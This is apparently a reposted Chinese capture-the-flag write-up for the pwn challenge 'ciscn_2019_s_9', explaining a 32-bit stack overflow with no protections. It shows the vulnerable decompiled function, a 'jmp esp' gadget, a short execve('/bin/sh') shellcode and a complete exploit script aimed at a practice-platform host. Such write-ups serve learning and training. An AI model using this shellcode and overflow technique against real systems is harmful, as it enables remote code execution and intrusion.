码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • ciscn_2019_s_9


    ciscn_2019_s_9

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    32位,啥也没开,开心愉悦写shellcode

    int pwn()
    {
      char s[24]; // [esp+8h] [ebp-20h]
    
      puts("\nHey! ^_^");
      puts("\nIt's nice to meet you");
      puts("\nDo you have anything to tell?");
      puts(">");
      fflush(stdout);
      fgets(s, 0x32, stdin);
      puts("OK bye~");
      fflush(stdout);
      return 1;
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14

    程序主要在这里,栈溢出,写shellcode进去然后执行,发现有个hint

    .text:08048551                 push    ebp
    .text:08048552                 mov     ebp, esp
    .text:08048554                 jmp     esp
    .text:08048554 hint            endp
    .text:08048554
    .text:08048554 ; ---------------------------------------------------------------------------
    .text:08048556                 db 90h
    .text:08048557 ; ---------------------------------------------------------------------------
    .text:08048557                 pop     ebp
    .text:08048558                 retn
    .text:08048558 ; } // starts at 8048551
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11

    这里有个jmp,ok好办了

    思路

    写shellcode,然后用jmp跳转到shellcode的头,然后执行shellcode

    因为栈只有0x20大小,所以不能使用pwntools生成的shellcode

    \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
    
    • 1

    这个是0x17大小的shellcode,平时收集的

    #from pwn import*
    #from Yapack import *
    r,elf=rec("node4.buuoj.cn",28508,"./pwn",10)
    context(os='linux', arch='i386',log_level='debug')
    #debug('b *0x400649')
    #debug('b *$rebase(0x1373)')
    
    sc=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
    pl=ljust(sc,0x24)+p32(0x8048554)+asm('sub esp,0x28;call esp')
    sla(b'>',pl)
    
    ia()
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12

    在这里插入图片描述

  • 相关阅读:
    肖sir__mysql之三表__008
    【红外图像】利用红外图像处理技术对不同制冷剂充装的制冷系统进行性能评估(Matlab代码实现)
    数字藏品实物化金谷诺亚艺博馆布局 携手翰德轩转变多维创新
    MySQL最详DDL和DML操作
    idea中Vue项目出现expression expected等格式错误之解决方法
    SpringCLoud——Feign的远程调用
    centos7卸载mongodb数据库
    协议-TCP协议-基础概念01-TCP头格式-TCP连接状态图-三次握手和四次挥手
    得物云原生全链路追踪Trace2.0架构实践
    Servlet--Response响应对象
  • 原文地址:https://blog.csdn.net/qq_62887641/article/details/133471107
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号